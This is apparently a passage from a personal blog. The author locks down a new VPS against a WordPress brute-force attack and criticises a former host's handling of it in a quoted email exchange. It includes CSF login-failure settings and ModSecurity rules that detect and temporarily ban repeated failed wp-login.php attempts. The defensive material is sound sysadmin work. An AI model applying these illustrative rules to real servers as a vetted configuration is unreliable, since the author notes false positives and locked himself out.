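print(heat_watts(200, 0.01))    # ~400 W
```

Note the current is squared, so the defect “didn’t avail itself” until the PDU was under significant load, exactly as their postmortem describes.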

0 to Attacked in No Time Flat

So as I’ve mentioned previously, I’ve moved to the world of a VPS, which for all intents and purposes is much like being self-hosted.  I used to do this stuff a long time ago; I still do it, but not nearly as intensively, and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server set up and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I had just set up this server, though; who could possibly be attacking it?

A6WLUZ bandwidth (full)

Bandwidth usage since I turned on the server.

You can see where I turned the server on on the 13th.  Notice that big spike shortly thereafter; yeah, that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site, since it locked up within minutes, and I had tweaked some server settings and thought that caused the instability.

Come Monday morning I had an email from A Girl that she could not get in, and 2 from the datacenter that they had rebooted the server after it ran out of memory and locked up.

A6WLUZ_load_full

System loading and availability since being turned on.

You can’t see it as well in those images, except for the latest incident, but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched my firewall from APF to CSF so I could gain use of LFD.  I spent last night installing and configuring it.
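If you’re setting up the same thing, the login-failure knobs live in /etc/csf/csf.conf. A minimal sketch of the sort of settings involved (the option names come from CSF’s stock config; the values here are illustrative, so check your version’s defaults):

```
LF_TRIGGER = "0"     # use per-service triggers rather than one global count
LF_SSHD = "5"        # block an IP after 5 failed SSH logins
LF_SSHD_PERM = "1"   # and make that block permanent
LF_HTACCESS = "5"    # block after 5 Apache htpasswd auth failures
LF_MODSEC = "5"      # block after 5 mod_security rule triggers
```

After editing, `csf -r` reloads the firewall so LFD picks up the changes.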

A6WLUZ Detail

The Proc Spike I had overnight.

 

A6WLUZ

A more detailed image of the bandwidth spikes.

There you can see the proc spike from an incident last night.  I did a few more tweaks to CSF, and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discovered that there is a way to have Apache watch all the wp-login pages for failed logins and, when they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach to handling the problem.

If you are a server administrator and want to protect against the WordPress brute force attack it is quite simple, doubly so if you have WHM.

Log in to WHM and go to Software > EasyApache.  Follow the on-screen instructions to rebuild Apache, making sure the modsec2 module is selected before you build.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

# Block WP logins with no referring URL
SecAction "phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210"
<LocationMatch "/wp-login.php">
    SecRule REQUEST_METHOD "POST" "deny,status:401,id:5000211,chain,msg:'wp-login request blocked, no referer'"
    SecRule &HTTP_REFERER "@eq 0"
</LocationMatch>

# WordPress brute force detection
SecAction "phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212"
<LocationMatch "/wp-login.php">
    # React if the block flag has been set.
    SecRule ip:bf_block "@gt 0" "deny,status:401,log,id:5000213,msg:'ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes'"
    # Set up tracking. On a successful login a 302 redirect is performed; a 200 indicates the login failed.
    SecRule RESPONSE_STATUS "^302" "phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214"
    SecRule RESPONSE_STATUS "^200" "phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215"
    SecRule ip:bf_counter "@gt 10" "t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0"
</LocationMatch>

Save the file and restart Apache.  This will help stop the brute force attacks.  If it wasn’t for the off chance of false positives, I’d be good with a perma-ban, dropping that axe like a rock…
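If you want to sanity-check what those rules actually do before trusting them, the per-IP counter logic restates cleanly in a few lines of Python (my paraphrase of the rules above, not anything ModSecurity ships): a failed login (HTTP 200) bumps a counter that decays at 1 count per 180 seconds, a successful login (302) clears it, and more than 10 failures raises a block flag that expires after 300 seconds.

```python
import time

BLOCK_SECONDS = 300      # expirevar:ip.bf_block=300
DECAY_PER_SEC = 1 / 180  # deprecatevar:ip.bf_counter=1/180
THRESHOLD = 10           # SecRule ip:bf_counter "@gt 10"

class BruteForceTracker:
    """Per-IP state mirroring the ModSecurity rules above."""

    def __init__(self, now=time.time):
        self.now = now
        self.state = {}  # ip -> {"counter", "stamp", "blocked_until"}

    def _decayed(self, rec, t):
        # deprecatevar: the counter bleeds off at 1 count per 180 s
        return max(0.0, rec["counter"] - (t - rec["stamp"]) * DECAY_PER_SEC)

    def is_blocked(self, ip):
        rec = self.state.get(ip)
        return bool(rec) and self.now() < rec["blocked_until"]

    def record_response(self, ip, status):
        t = self.now()
        rec = self.state.setdefault(
            ip, {"counter": 0.0, "stamp": t, "blocked_until": 0.0})
        rec["counter"] = self._decayed(rec, t)
        rec["stamp"] = t
        if status == 302:      # successful login: reset the counter
            rec["counter"] = 0.0
        elif status == 200:    # failed login: bump the counter
            rec["counter"] += 1
            if rec["counter"] > THRESHOLD:
                rec["blocked_until"] = t + BLOCK_SECONDS
                rec["counter"] = 0.0
```

Running attack traffic through this mentally makes it obvious why a legitimate user who fat-fingers a password a couple of times never trips it, while a script hammering wp-login.php does almost immediately.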

Funny story: I dropped that !@#$ing axe on myself tonight.  Most of the other services are watched by LFD, and when you rack up multiple login failures, it drops the axe, and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business, tried to log in a couple times with the wrong password, and bam, there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that, it sounds like my intrusion detection system works for the TSA.

In the meantime the folks I got the VPS from (they’ve been fantastic support-wise, unlike that previous host) are looking into trying to figure out what’s causing the load spikes.  The bummer is that it happens randomly, so it’s a pain to catch in the act.  The good news is the server has actually survived the past couple slams, so it’s almost there.  Security-wise it isn’t a concern; it’s just an issue with service.

Too Little Too Late…

So I got the following email at 1630 tonight.  I know the ball started rolling at 0800 this morning, thanks to Twitter.  They may have had that many complaints to work through, but here is the email I got.

Dear Barron,

My name is CS Rep and I am writing you from Customer Relation Department. Your case was brought to my attention because you gave us a bad review on Twitter. We are very serious about providing you with an exceptional hosting and customer service experience, we would like to confirm that everything is running as you would like. What would it take for us to became the best hosting provider for you?
Your feedback is crucial for our business to move forward. We are still that strong company with quality and products as we continue to invest more into support and service in terms of training and technology.
Do not hesitate to use my direct line (her number) or 24/7 technical support (their number) or simply reply to this email: [email protected].

Thank you for choosing myhosting.com, I hope we can get your positive tweets shorty.

Sincerely,

CS Rep

My world at work is customer service.  So I am always willing to respond so that if they’re actually willing to improve their service they can.  Here is my response.

Hi Olga,

Let me start off by saying that at this point I will be leaving myHosting.  I have invested in outside hosting; at best I will retain my myHosting account for Exchange email purposes.  That said, as someone who works for a company that prides itself on customer service, I’m going to lay out the whole thing from beginning to end and give my perspective on it.

Last month I had regular service issues despite my use of the CloudFlare CDN. I opened ticket #: FNF-528-19240

After multiple back-and-forth arguments about whether or not my site was even hosted with myHosting, they finally just blamed CloudFlare.  The problem continued, but with less frequency, and I just dealt with it.  For the most part the site would immediately come back on a refresh, and none of my customers were noticing an issue or reporting one to me.

Then in the midst of this WordPress attack, I started to have issues a little more frequently.  I started to get emails from my customers, and I did what I could on my end to fix the issue.  Then it happened: I and all my customers, 4 total, were locked out of our sites.  We were locked out without any email in my inbox about how to fix the issue.  When the solution did arrive, after my promptly emailing support, it was one that none of my 4 customers could implement, and it wasn’t even feasible for 2 of them.  Despite my efforts in maintaining a secure WordPress site, including plugins to stop the brute force attacks, my site was rendered unusable not just to me, but to my customers.  I actually had to disable CloudFlare, thus increasing my exposure to spam and other undesirable traffic.

Just so I am perfectly clear: the actions myHosting took to “secure” the websites for which I am responsible resulted in their inability to function for my customers.  It took me at least 12 hours before I could finally get those sites unlocked for my customers.  During this time my ability to handle issues, as well as my customers’ perception of me, was degraded.  Doubly so since trying to unlock 2 of the sites resulted in 500 internal server errors.  Once that error was corrected, clean URLs were broken due to other changes myHosting had made to the .htaccess files.  Instead of just correcting their errors in the files, they dumped them.  This made me look like an idiot again when a customer informed me in the morning he was getting 404 errors.

That night I started the migration to a VPS with another company.  I could not trust that myHosting, even in a VPS, would not mess with my files or otherwise cause me issues and heartache.

I will say the one shining spot in this entire mess was that I appeared to deal with a single support representative.  That is ownership, and honestly that is what I like to see.  Here is his last email.  Don’t blame him, though; he was trying to keep the peace and convey your situation.  It is a lesson in needing to be seriously empathetic to customers and in the effects of your actions as a provider.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict.
Because you appear to have a very secure webspace, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack, so please proceed with caution and make sure all wordpress user passwords are complex and secure.

We have disabled the .htaccess files on those two websites and they appear to be loading currently. If you would like, remove all the added code and turn your cloudflare back on.

Please let it be known we are trying to protect our customers the best possible way. Because of the urgency of the matter, this was the quickest solution. We hope this does not ruin your experience with myhosting.com.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

Here’s how I read it:

Your text as written.
[My corrections in phrasing, in brackets.]
*My mental commentary while reading, between asterisks.*

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. *Because evidently the idea that someone would be unhappy about being locked out of their own website surprises us.*

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict [decided to treat all our users like idiotic children that know nothing about anything]. *Luckily I have experience with being penalized because of the actions of others.*

Because you appear to have a very secure webspace [actually know what the fuck you’re doing and have previously educated our support staff], you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack [a brute force attack where they just randomly try passwords], so please proceed with caution and make sure all wordpress user passwords are complex and secure. *Why in the name of god do you think I use KeePass and generate 20-character password strings, just for the ease in memorization?*

We have disabled the .htaccess files on those two websites and they appear to be loading currently [but we broke clean URLs so they’re still not working right, our bad?]. If you would like, remove all the added code and turn your cloudflare back on. *You mean I can unfuck my websites if I so choose!? Here I thought you guys were just out to screw me in front of people I support. And yes, I unfucked every one I could as fast as I could, even before I got your permission!*

Please let it be known we are trying to protect our customers the best possible way [by nuking the site from orbit, treating our customers like children and blocking their access to their own sites just the same as the attackers]. Because of the urgency of the matter, this was the quickest solution [because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin]. We hope this does not ruin [are sorry this has completely ruined] your experience with myhosting.com. *We didn’t consider the ramifications of how our actions could possibly make our customers look in the eyes of their own clients. We will think about possibly not treating all our customers like children in the future, but don’t count on it.*
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

And yes, this did go up on my blog; this email will be going up as well.  I want you to understand exactly how badly this has cut into me.  I pride myself on customer service, and whenever possible I stop what I’m doing to help when there is an issue.  Even when these people do not pay me a dime for my services.  I get an email at 0400 in the morning, and if my phone actually wakes me up I will look and go fix the problem.  I take my wife out to dinner, get a text message that the server is down, and I spend the rest of dinner cranking away on my phone to fix the problem.  That is customer service: owning the problem and fixing it.  Most definitely you do NOT create problems for the customer, and if you do, you fix them 100% and ensure the site is returned to normal.  You do everything you can for that customer to ensure the problem is fixed immediately and any issues created are taken care of, or assisted with, to the best of your ability.

You must also remember that when you do go and do something like that, it has consequences beyond just your visible customer level.  Your customers have customers.  Some have businesses, and those types of actions cost them money and trust.  In this case myHosting raised a question regarding my integrity and my ability to be a provider for website services.  Integrity once lost can never be regained, and I find the actions of myHosting downright deplorable given their impact on me, my business, and my customers.

If you have any other questions feel free to ask.

Sincerely,

Barron Barnett

I’m not holding out for another response back, but I figured I’d give them honest feedback. I will say I was kind of happy to get the kick in the ass to go get a VPS.